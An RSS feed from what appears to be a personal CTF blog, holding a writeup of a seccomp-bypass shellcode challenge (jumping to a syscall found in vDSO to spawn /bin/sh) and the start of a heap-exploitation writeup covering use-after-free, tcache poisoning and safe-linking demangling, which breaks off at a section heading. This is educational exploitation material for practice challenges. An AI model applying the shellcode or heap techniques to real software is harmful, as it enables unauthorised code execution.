<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet href="/rss.xsl" type="text/xsl"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Ub1k&apos;s Blog | Capture The Flag &amp; Vulnerability Research</title><description>Cybersecurity blog by David Hermes (Ub1k). In-depth binary exploitation, heap pwn, reverse engineering, and CTF writeups.</description><link>https://blog.davidherm.es</link><item><title>he_protecc: CornCTF 2025</title><link>https://blog.davidherm.es/posts/he_protecc</link><guid isPermaLink="true">https://blog.davidherm.es/posts/he_protecc</guid><description>Writeup of a shellcode executer challenge with seccomp filters.</description><pubDate>Fri, 20 Jun 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;he_protecc: CornCTF 2025&lt;/h2&gt;
&lt;p&gt;This is the first pwn challenge of CornCTF 2025.&lt;/p&gt;
&lt;p&gt;Upon inspecting the binary we immediately notice two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The security mitigations are very relaxed&lt;/strong&gt;: the GOT is writable (Partial RELRO) and the code is not position independent (No PIE), so its addresses are not randomized.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The ELF is statically linked&lt;/strong&gt;: so ret2libc is off the table and we can ignore shenanigans with dynamic libraries this time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-018.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;When we run the binary, we are prompted for the length of some shellcode, followed by the shellcode itself.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-02.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It would definitely be too easy if we could just execute an &lt;code&gt;execve(&quot;/bin/sh&quot;, NULL, NULL)&lt;/code&gt; and get a shell.
Let&apos;s take a closer look at the binary to see what&apos;s really happening.&lt;/p&gt;
&lt;h2&gt;Looking around&lt;/h2&gt;
&lt;p&gt;Disassembling the binary reveals code that is easy to read and understand. Let&apos;s look at the most important parts.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-013.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;mmap my beloved&lt;/h3&gt;
&lt;p&gt;:::note
&lt;strong&gt;mmap&lt;/strong&gt;() creates a new mapping in the virtual address space of the calling process. In other words, it creates a new memory area at a position and with permissions chosen by the caller. It is used when loading dynamically linked binaries and, in some cases, for heap allocation.
In our case the program needs an mmap region because no existing area is writable and executable at the same time.
:::&lt;/p&gt;
&lt;p&gt;The mmap call is easy to understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;New memory area is &lt;strong&gt;mapped&lt;/strong&gt; at position &lt;code&gt;0x500000&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;size&lt;/strong&gt; is &lt;code&gt;0x1000&lt;/code&gt; bytes (one page or 4096 bytes).&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;permission&lt;/strong&gt; parameter is &lt;code&gt;RWX&lt;/code&gt;: &lt;code&gt;001 | 010 | 100 = 111 (7)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
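&lt;p&gt;As a quick sanity check of that last bullet, here is a minimal Python sketch that rebuilds the permission value from its three bits. The constants are the Linux values of &lt;code&gt;PROT_READ&lt;/code&gt;, &lt;code&gt;PROT_WRITE&lt;/code&gt; and &lt;code&gt;PROT_EXEC&lt;/code&gt;, written out by hand so the snippet does not depend on the platform; the helper &lt;code&gt;describe_prot&lt;/code&gt; is a made-up name used only for illustration.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Linux protection bits, as passed in the third argument of mmap()
PROT_READ = 0b001
PROT_WRITE = 0b010
PROT_EXEC = 0b100


def describe_prot(prot):
    """Return an RWX-style string for an mmap protection value."""
    names = ((PROT_READ, "R"), (PROT_WRITE, "W"), (PROT_EXEC, "X"))
    # A bit is set when OR-ing it in does not change the value
    return "".join(ch if prot | bit == prot else "-" for bit, ch in names)


rwx = PROT_READ | PROT_WRITE | PROT_EXEC
print(rwx, describe_prot(rwx))  # 7 RWX
&lt;/code&gt;&lt;/pre&gt;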
&lt;p&gt;To understand the flags we can use the &lt;code&gt;strace&lt;/code&gt; command and read the call from there:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-012.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;These two flags simply signal that the mapped region is private to our process and not backed by any file, which means the area is initialized with zeroes.&lt;/p&gt;
&lt;p&gt;A boring mmap region, nothing special here... sadly&lt;/p&gt;
&lt;h3&gt;seccomp&lt;/h3&gt;
&lt;p&gt;I&apos;m not going to show the full &lt;code&gt;setup_seccomp()&lt;/code&gt; disassembly as it is a bit ugly; the important part comes at the end:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-014.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;prctl&lt;/code&gt; call sets the &lt;strong&gt;NO_NEW_PRIVS&lt;/strong&gt; flag. Why? The kernel only lets an unprivileged process install a seccomp filter if this flag is set: it guarantees that nothing executed afterwards can gain privileges, so a crafted filter cannot be used to trick a set-uid program into misbehaving. That is why it comes before every seccomp installation (&lt;a href=&quot;https://unix.stackexchange.com/questions/562260/why-we-need-to-set-no-new-privs-while-before-calling-seccomp-mode-filter&quot;&gt;explanation&lt;/a&gt;).
The next instruction, the syscall, installs a seccomp filter on the process.&lt;/p&gt;
&lt;p&gt;:::note
As the name suggests, seccomp is a mechanism to harden syscall access by evaluating a small program called a Berkeley Packet Filter (BPF) for every syscall. Based on the result, the syscall is either allowed or denied.
:::&lt;/p&gt;
&lt;p&gt;So the question becomes: what does this seccomp filter allow?
I was today years old when I learned that I don&apos;t need to decode seccomp filters manually... there is a tool for that, thanks Marco (&lt;a href=&quot;https://github.com/david942j/seccomp-tools&quot;&gt;GitHub&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Running &lt;code&gt;seccomp-tools dump ./protected&lt;/code&gt; gives:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; line  CODE  JT   JF     K
=================================
 0000: 0x20 0x00 0x00 0x00000008  A = instruction_pointer
 0001: 0x01 0x00 0x00 0x003fffff  X = 4194303 (0x3fffff)
 0002: 0x2d 0x00 0x0a 0x00000000  if (A &amp;lt;= X) goto 0013
 0003: 0x01 0x00 0x00 0x004b7fff  X = 4947967 (0x4b7fff)
 0004: 0x2d 0x00 0x07 0x00000000  if (A &amp;lt;= X) goto 0012
 0005: 0x01 0x00 0x00 0x004fffff  X = 5242879 (0x4fffff)
 0006: 0x2d 0x00 0x06 0x00000000  if (A &amp;lt;= X) goto 0013
 0007: 0x01 0x00 0x00 0x00500fff  X = 5246975 (0x500fff)
 0008: 0x2d 0x00 0x03 0x00000000  if (A &amp;lt;= X) goto 0012
 0009: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer &amp;gt;&amp;gt; 32
 0010: 0x01 0x00 0x00 0x00007fff  X = 32767 (0x7fff)
 0011: 0x2d 0x00 0x01 0x00000000  if (A &amp;lt;= X) goto 0013
 0012: 0x06 0x00 0x00 0x80000000  return KILL_PROCESS
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is &lt;em&gt;not&lt;/em&gt; a typical seccomp filter. Normally a seccomp filter checks the syscall number against a whitelist and returns whether it is permitted, but this filter loads the instruction pointer (&lt;code&gt;RIP&lt;/code&gt;) at the moment the syscall is executed and returns ALLOW only if it falls in one of the following ranges; otherwise the process gets killed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;At or below &lt;code&gt;0x3fffff&lt;/code&gt;: but that&apos;s not possible because the binary is mapped starting at &lt;code&gt;0x400000&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Above &lt;code&gt;0x4b7fff&lt;/code&gt;, up to &lt;code&gt;0x4fffff&lt;/code&gt;: but there are no syscalls in that region.&lt;/li&gt;
&lt;li&gt;Above &lt;code&gt;0x500fff&lt;/code&gt;, up to &lt;code&gt;0x7fffffffffff&lt;/code&gt;: everything after the mmap region, so this is why we can&apos;t execute a syscall in the shellcode :(&lt;/li&gt;
&lt;/ul&gt;
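&lt;p&gt;To double-check the ranges above, the filter can be re-implemented in a few lines of Python. This is only a sketch of how the dump reads, not code from the challenge: the function name &lt;code&gt;seccomp_verdict&lt;/code&gt; and the sample addresses are hypothetical. It mirrors the fact that the BPF program compares the low 32 bits of the instruction pointer first and only then looks at the high 32 bits.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def seccomp_verdict(ip):
    """Model of the dumped filter: decide from the syscall address alone."""
    low = ip % 2**32    # A = instruction_pointer (low half)
    high = ip // 2**32  # A = instruction_pointer, high half (line 0009)
    if low in range(0x0, 0x400000):
        return "ALLOW"  # lines 0001-0002
    if low in range(0x400000, 0x4B8000):
        return "KILL"   # lines 0003-0004, the code of the binary itself
    if low in range(0x4B8000, 0x500000):
        return "ALLOW"  # lines 0005-0006
    if low in range(0x500000, 0x501000):
        return "KILL"   # lines 0007-0008, our mmap page
    # lines 0009-0011: only user-space addresses pass the last check
    return "ALLOW" if high in range(0x0, 0x8000) else "KILL"


print(seccomp_verdict(0x500010))        # KILL  (syscall inside the shellcode page)
print(seccomp_verdict(0x401234))        # KILL  (syscall inside the binary)
print(seccomp_verdict(0x7FFFF7FC1ABC))  # ALLOW (a typical high user-space address)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One side effect of the 32-bit comparison, at least in this model: an address such as &lt;code&gt;0x7ffd00450000&lt;/code&gt; would still be killed, because its low half falls inside the range of the binary.&lt;/p&gt;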
&lt;p&gt;But WAIT, what can we find after &lt;code&gt;0x500fff&lt;/code&gt; but before &lt;code&gt;0x7fffffffffff&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Let&apos;s run our debugger of choice and look at the mappings:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-015.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;vmmap&lt;/code&gt; we can see that only one mapping in that range is both readable and executable, and that is &lt;code&gt;vdso&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;:::note
&lt;strong&gt;vDSO&lt;/strong&gt; (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode. (&lt;a href=&quot;https://en.wikipedia.org/wiki/VDSO&quot;&gt;Wikipedia&lt;/a&gt;)
:::&lt;/p&gt;
&lt;p&gt;By piping the disassembly of that memory area into &lt;code&gt;grep&lt;/code&gt; we can see a few syscall instructions inside &lt;code&gt;vdso&lt;/code&gt;. Jumping to one of them should give us the syscall we need!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-016.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Leak &amp;amp; Pwn&lt;/h2&gt;
&lt;p&gt;Here comes the problem: even though the ELF is not PIE, the stack and &lt;code&gt;vdso&lt;/code&gt; still get randomized by &lt;strong&gt;ASLR&lt;/strong&gt;. Even worse, the offsets inside &lt;code&gt;vdso&lt;/code&gt; can differ from one kernel build to another, so we cannot rely on the ones we see locally... But let&apos;s tackle one problem after another:&lt;/p&gt;
&lt;h3&gt;The Leak&lt;/h3&gt;
&lt;p&gt;Using &lt;code&gt;p2p stack vdso&lt;/code&gt; we can see 4 pointers into &lt;strong&gt;vdso&lt;/strong&gt; on the stack. Let&apos;s choose the first one.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-017.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Assembly&lt;/h3&gt;
&lt;p&gt;Now comes the &lt;em&gt;difficult&lt;/em&gt; part: we can&apos;t hard-code the offset between the syscalls and our leak because we cannot guarantee that the internal offsets are the same on the remote machine. We need to scan the memory area...&lt;/p&gt;
&lt;p&gt;The first part is easy, let&apos;s take the first leak and put it into a register:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mov r8, [rbp - 0x218]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We could zero out the 12 least significant bits of this leak to align the address to the start of a memory page, but in our case it&apos;s unnecessary: we already know there are 5 syscall instructions scattered across the region, and it is impossible that they are all contained in the first &lt;code&gt;0x340&lt;/code&gt; bytes of the page.
Now let&apos;s scan the memory region for a syscall instruction. Remember that its opcode is &lt;code&gt;0x0F05&lt;/code&gt;, but x86 is little-endian, so when we load the two bytes as a 16-bit word their order is swapped:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;loop:
inc r8
mov ax, word ptr [r8]
cmp ax, 0x050f // &amp;lt;-- syscall opcode but reversed
jne loop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code snippet increments &lt;code&gt;r8&lt;/code&gt; (the pointer leaked from &lt;code&gt;vdso&lt;/code&gt;) and reads two bytes, then checks whether they match the bytes of a syscall instruction; if not, the loop continues. When the loop exits, &lt;code&gt;r8&lt;/code&gt; points to a valid syscall instruction, and we can go on to set the other registers for an execve call.&lt;/p&gt;
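&lt;p&gt;The same scan is easy to prototype in Python on a dumped copy of the region before writing the assembly. In this sketch the buffer contents and the name &lt;code&gt;find_syscall&lt;/code&gt; are invented for illustration; only the two opcode bytes come from the text above.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SYSCALL = b"\x0f\x05"  # bytes of the syscall instruction in memory order

# Read as a little-endian 16-bit word, these bytes compare equal to 0x050f
assert int.from_bytes(SYSCALL, "little") == 0x050F


def find_syscall(memory, leak_offset):
    """Offset of the first syscall opcode strictly after leak_offset, or -1."""
    # The assembly loop increments r8 before comparing, hence the + 1
    return memory.find(SYSCALL, leak_offset + 1)


# Made-up stand-in for a few bytes of vdso: nop, nop, mov eax 0x60, syscall, ret
fake_vdso = bytes.fromhex("9090b8600000000f05c3")
print(find_syscall(fake_vdso, 0))  # 7
&lt;/code&gt;&lt;/pre&gt;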
&lt;pre&gt;&lt;code&gt;mov r9, {u64(b&quot;/bin/sh\0&quot;)}
push r9

mov rax, 59 
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx

jmp r8 // &amp;lt;-- jump to syscall outside our mmap area
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sending this payload spawns a shell, and with a simple &lt;code&gt;cat flag.txt&lt;/code&gt; we get the flag!&lt;/p&gt;
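&lt;p&gt;For reference, the &lt;code&gt;{u64(...)}&lt;/code&gt; placeholder in the shellcode template expands to a plain 64-bit immediate. The sketch below reproduces the value with the standard library only: &lt;code&gt;int.from_bytes&lt;/code&gt; stands in for the pwntools &lt;code&gt;u64&lt;/code&gt; helper, and the variable names are illustrative.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# "/bin/sh" plus its NUL terminator is exactly 8 bytes, i.e. one 64-bit register
binsh = int.from_bytes(b"/bin/sh\0", "little")
print(hex(binsh))  # 0x68732f6e69622f

# After "push r9" the bytes sit on the stack in their original order
assert binsh.to_bytes(8, "little") == b"/bin/sh\0"

# First line of the shellcode template with the placeholder filled in
first_instruction = f"mov r9, {binsh}"
&lt;/code&gt;&lt;/pre&gt;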
</content:encoded><author>David Hermes</author></item><item><title>Babyheap: JustCTF - Chapter 1</title><link>https://blog.davidherm.es/posts/babyheap</link><guid isPermaLink="true">https://blog.davidherm.es/posts/babyheap</guid><description>Writeup of a Heap Exploitation challenge with environ leak.</description><pubDate>Mon, 20 Oct 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Normally, especially for beginners, seeing a baby challenge is always a very refreshing alternative to the high level tasks made to challenge also the best of players.&lt;/p&gt;
&lt;p&gt;You solve a very simple challenge and get the chance to encounter a new technique in a simple and protected setting. Babyheap breaks one of these assumptions. To be fair, the title never says which kind of &lt;em&gt;baby&lt;/em&gt; is intended: a newborn beluga whale, for example, can weigh as much as $100$kg, enough to crush my sanity.&lt;/p&gt;
&lt;p&gt;By the end of this write-up, I hope you’ll understand both my frustration and my realization: maybe my assumptions about baby challenges were wrong from the start. In fact, I learned more about &lt;code&gt;libc&lt;/code&gt; internals and exploitation techniques in this single challenge than in all the other “baby” ones combined.&lt;/p&gt;
&lt;p&gt;This is a two-part journey: from simple heap exploitation to advanced techniques, and finally, as dessert, an &lt;code&gt;exit_function&lt;/code&gt; overwrite and &lt;code&gt;environ&lt;/code&gt; leak.&lt;/p&gt;
&lt;h2&gt;The disassembly&lt;/h2&gt;
&lt;p&gt;As usual, we are not going to look at the entire binary, but instead focus on the relevant parts. For context, the program is straightforward:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;create_chunk()&lt;/code&gt; Allocates a buffer of size &lt;code&gt;0x30&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;modify_chunk()&lt;/code&gt; Allows you to overwrite the contents of an existing chunk.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;read_chunk()&lt;/code&gt; Reads the full &lt;code&gt;0x30&lt;/code&gt; bytes from a chunk.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;delete_chunk()&lt;/code&gt; Frees the chunk.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are gonna concentrate on two of these functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//babyheap
int create_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&amp;amp;chunks + index) )
	return puts(&quot;This index is already in use&quot;);
  *((_QWORD *)&amp;amp;chunks + index) = malloc(0x30uLL);
  printf(&quot;Content? &quot;);
  printf(&quot;Content? &quot;); //wtf why?
  return read(0, *((void **)&amp;amp;chunks + index), 0x30uLL);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As described above, this function creates a chunk and saves its address in an array of at most $20$ entries. If the entry is already occupied, it prints an error message and returns without allocating.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//babyheap
void delete_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&amp;amp;chunks + index) )
    free(*((void **)&amp;amp;chunks + index));
  else
    puts(&quot;This chunk is empty&quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the &lt;code&gt;delete_chunk()&lt;/code&gt; function we notice that it doesn&apos;t remove the address from the array after freeing it. This has two implications: &lt;em&gt;first&lt;/em&gt;, it is possible to read from and write to a freed chunk (a use-after-free), and &lt;em&gt;second&lt;/em&gt;, once a chunk has been created you cannot call &lt;code&gt;create_chunk()&lt;/code&gt; on the same index again, which limits us to a maximum of 20 &lt;code&gt;create_chunk()&lt;/code&gt; calls.&lt;/p&gt;
&lt;h2&gt;Heap Exploitation&lt;/h2&gt;
&lt;p&gt;:::warning
&lt;strong&gt;Heap exploitation&lt;/strong&gt; is a complex topic, so I won’t go too deep here. If you are interested here is a link to some &lt;a href=&quot;https://5o1z.github.io/blog/heapexploitation/getting_started/&quot;&gt;material&lt;/a&gt;.
:::&lt;/p&gt;
&lt;p&gt;When &lt;code&gt;malloc()&lt;/code&gt; is called, it generally returns an address on the heap. This address points to the user data of a small structure, and the fields just before it hold important metadata. We call these memory areas chunks.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-002.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From now on we will include the header when talking about a chunk, so its size becomes 0x40 instead of 0x30.&lt;/strong&gt;
Looking at the chunk header, we notice a few significant fields. The size field stores the number of bytes between this chunk and the next one, yet nothing stops us from writing more bytes than the amount specified there.
Another interesting part is the P flag (&lt;code&gt;prev_inuse&lt;/code&gt;): if it is set, free() knows that the previous chunk is currently allocated; if it isn&apos;t, the allocator may try to merge the two chunks into a bigger one.&lt;/p&gt;
&lt;h3&gt;The bins&lt;/h3&gt;
&lt;p&gt;When a chunk is freed, from &lt;code&gt;LIBC-2.26&lt;/code&gt; onwards the allocator first tries to insert it at the head of a per-size-class singly linked list called the &lt;strong&gt;tcache&lt;/strong&gt;. Each list can hold up to 7 chunks, and there is one list per size class up to a chunk size of 0x410 bytes.&lt;/p&gt;
&lt;p&gt;In the free operation, the first 0x10 bytes of the user data are overwritten with a pointer to the next chunk in the list (fd) and a random value called tcache key used to prevent double frees (not to be confused with the tcache &lt;strong&gt;mangling&lt;/strong&gt; key explained later in this chapter). This means that when a freed chunk is read, you won&apos;t read the content it stored before but a pointer to a previously freed chunk or, if this is the first freed chunk, a null pointer.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-003.webp&quot; alt=&quot;|470x182&quot; /&gt;&lt;/p&gt;
&lt;p&gt;If more than 7 chunks of the same size are freed and the chunk size is between &lt;code&gt;0x20&lt;/code&gt; and &lt;code&gt;0x80&lt;/code&gt; bytes, the allocator puts the extra ones into the &lt;strong&gt;fastbin&lt;/strong&gt;. Fastbins have no limit on the number of chunks they can store, but are restricted to the aforementioned size classes. Also, the fd pointer of a fastbin chunk doesn&apos;t point to the next chunk&apos;s fd field but to the start of its header (the prev_size field).&lt;/p&gt;
&lt;p&gt;If the tcache is full and the elements are not compatible with the fastbin size-classes, or in very specific cases when mechanisms trigger &lt;em&gt;fastbin consolidation&lt;/em&gt; (foreshadowing), chunks are placed into the &lt;strong&gt;unsortedbin&lt;/strong&gt;. From there they can get sorted into &lt;strong&gt;largebins&lt;/strong&gt; or &lt;strong&gt;smallbins&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;These last three bins are implemented as doubly linked circular lists. Their heads are stored in the &lt;strong&gt;libc address space&lt;/strong&gt;, more precisely in the &lt;code&gt;main_arena&lt;/code&gt;. Because the lists are circular, the &lt;strong&gt;last&lt;/strong&gt; element has a forward (fd) pointer to the head of the list stored in the arena, and because they are doubly linked, the &lt;strong&gt;first&lt;/strong&gt; element has a backward (bk) pointer to it too. So by reading a freed chunk in one of these bins you can obtain a libc leak.&lt;/p&gt;
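&lt;p&gt;The routing described in this section can be condensed into a toy decision function. This is a deliberately simplified sketch, assuming default glibc settings on 64-bit and ignoring consolidation with the top chunk and mmapped chunks; &lt;code&gt;first_bin&lt;/code&gt; and its parameters are hypothetical names, not glibc code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TCACHE_SLOTS = 7                          # entries per tcache size class
TCACHE_SIZES = range(0x20, 0x410 + 0x10)  # chunk sizes (header included) the tcache accepts
FASTBIN_SIZES = range(0x20, 0x80 + 0x10)  # chunk sizes the fastbins accept


def first_bin(chunk_size, tcache_count):
    """Name the bin a freed chunk lands in first.

    chunk_size   -- size including the 0x10 header, e.g. 0x40 for malloc(0x30)
    tcache_count -- chunks already stored in the tcache list of that size
    """
    if chunk_size in TCACHE_SIZES and tcache_count != TCACHE_SLOTS:
        return "tcache"
    if chunk_size in FASTBIN_SIZES:
        return "fastbin"
    return "unsortedbin"


print(first_bin(0x40, 0))   # tcache
print(first_bin(0x40, 7))   # fastbin
print(first_bin(0x440, 0))  # unsortedbin
&lt;/code&gt;&lt;/pre&gt;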
&lt;h3&gt;tcache poisoning&lt;/h3&gt;
&lt;p&gt;If this binary had &lt;strong&gt;Partial RELRO&lt;/strong&gt; and was &lt;strong&gt;non-PIE&lt;/strong&gt;, we could have allocated two chunks and then freed them.&lt;br /&gt;
Once freed, both chunks would be placed into the &lt;code&gt;tcache&lt;/code&gt; linked list, and where their data once resided, pointers to the next chunk in the list would now be written. By modifying the forward pointer of the last freed chunk (the first element in the tcache list) to point to something like the GOT, the allocator would think that the second element of the tcache list (originally the first deallocated chunk) is located in the GOT.&lt;/p&gt;
&lt;p&gt;:::warning
From &lt;code&gt;LIBC-2.32&lt;/code&gt; onwards, the forward pointers (&lt;code&gt;fd&lt;/code&gt;) saved in freed tcache entries are &lt;strong&gt;encoded&lt;/strong&gt; (mangled).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//libc internals
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) &amp;gt;&amp;gt; 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&amp;amp;ptr, ptr)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The macro takes as input the position where the pointer is stored and the address the pointer points to.&lt;/p&gt;
&lt;p&gt;It then shifts away the 12 least significant bits of the position value. A memory page is generally 0x1000 bytes long (12 bits of offset), so this removes the position inside the page and leaves only the &lt;strong&gt;page address&lt;/strong&gt;. In other words, two chunks in the same page will have the same &lt;code&gt;((size_t) pos) &amp;gt;&amp;gt; 12&lt;/code&gt; value.
It then XORs this value with the pointer to mangle it.&lt;/p&gt;
&lt;p&gt;This ensures that the &lt;em&gt;encoded value depends both on the pointer and on the page where it is stored&lt;/em&gt;. Pointers stored in different pages will be mangled differently, even if they point to the same target.&lt;/p&gt;
&lt;p&gt;Applying the same operation again reveals the pointer.&lt;/p&gt;
&lt;p&gt;But this encoding is easily reversed: for a pointer that targets the same page it is stored in, the page address used for mangling is part of the pointer itself, so the algorithm is really just a deterministic scramble. XORing the mangled pointer with shifted copies of itself completely decodes it.&lt;/p&gt;
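&lt;pre&gt;&lt;code&gt;def demangle_alone(ptr, page_offset=0):
    # With p the original pointer: cancel the (p &amp;gt;&amp;gt; 12) term, leaving p ^ (p &amp;gt;&amp;gt; 24)
    mid = ptr ^ ((ptr &amp;gt;&amp;gt; 12) + page_offset)
    # Cancel the (p &amp;gt;&amp;gt; 24) term; the leftover p &amp;gt;&amp;gt; 48 is zero for user-space addresses
    return mid ^ (mid &amp;gt;&amp;gt; 24)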
&lt;/code&gt;&lt;/pre&gt;
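&lt;p&gt;A small round trip makes the macro less abstract. The sketch below re-implements &lt;code&gt;PROTECT_PTR&lt;/code&gt; and &lt;code&gt;REVEAL_PTR&lt;/code&gt; in Python with made-up heap addresses; it uses an integer division by 0x1000 in place of the 12-bit right shift, which is equivalent for non-negative integers. The function and variable names are illustrative.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PAGE = 0x1000  # dividing by the page size is the same as shifting right by 12


def protect_ptr(pos, ptr):
    """Mangle ptr the way the macro does when storing it at address pos."""
    return (pos // PAGE) ^ ptr


def reveal_ptr(pos, mangled):
    """Undo protect_ptr; XOR with the same key restores the pointer."""
    return protect_ptr(pos, mangled)


# Hypothetical addresses of two freed 0x40 chunks in the same heap page
chunk_a = 0x55555555B2A0
chunk_b = 0x55555555B2E0

stored = protect_ptr(chunk_b, chunk_a)  # fd value written into chunk_b
assert reveal_ptr(chunk_b, stored) == chunk_a

# The last entry of a list has next == NULL, so reading it leaks the key itself
key = protect_ptr(chunk_a, 0)
print(hex(key))  # 0x55555555b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That last line is why reading a freed chunk whose next pointer is NULL is enough to recover the XOR key for its heap page.&lt;/p&gt;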
&lt;p&gt;:::
Then, by reallocating the two chunks, the allocator would return the address of the GOT as the second allocation (the first 16 bytes get zeroed out, look at the note below), we could then:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Read&lt;/strong&gt; from the GOT by reading from the second chunk to leak a libc address, but this only works with &lt;code&gt;fwrite()&lt;/code&gt; or similar, because the first 0x10 bytes are null and would terminate &lt;code&gt;printf&lt;/code&gt; or &lt;code&gt;puts&lt;/code&gt; instantly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Overwrite&lt;/strong&gt; a GOT entry (&lt;code&gt;free&lt;/code&gt;) with the address of &lt;code&gt;system()&lt;/code&gt;, giving us a shell the next time that function is called.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;:::note
From &lt;code&gt;LIBC-2.29&lt;/code&gt; after the 8 byte fd pointer saved in the chunk, another 8 bytes get used to store the &lt;strong&gt;tcache key&lt;/strong&gt;, these &lt;strong&gt;16 bytes get zeroed out&lt;/strong&gt; when a chunk gets allocated. If this tcache key is present when a free operation is done, that tcache bin gets checked for a double free, else no check is done.
:::
But that’s not the case here… behold:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-006.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Still, this very simple technique called &lt;strong&gt;tcache poisoning&lt;/strong&gt; will prove useful several times throughout this writeup.&lt;/p&gt;
&lt;p&gt;But let’s exit this hypothetical scenario and focus on the real limitations we face: the binary has &lt;strong&gt;no apparent address leak&lt;/strong&gt; and &lt;strong&gt;no buffer overflow&lt;/strong&gt;, we need to take control in some other way.&lt;/p&gt;
&lt;h2&gt;The Plan&lt;/h2&gt;
&lt;p&gt;Our actual goal is to gain &lt;strong&gt;arbitrary read and write primitives within libc&lt;/strong&gt;. With these, we can leak crucial pointers like &lt;code&gt;__environ&lt;/code&gt; or &lt;code&gt;__exit_funcs&lt;/code&gt;, among others, and eventually get to a shell.
At this point, it’s worth clarifying that I didn’t solve this challenge during the competition itself. Instead, I studied various writeups to deeply understand the possible solutions and their underlying mechanics.&lt;/p&gt;
&lt;p&gt;I’ll present &lt;strong&gt;two&lt;/strong&gt; methods to leak a libc pointer, followed by &lt;strong&gt;two&lt;/strong&gt; techniques to leverage that leak to achieve a shell. The first leak and exploit can be found in this part, the second part includes a more exotic variant.&lt;/p&gt;
&lt;h2&gt;House of something&lt;/h2&gt;
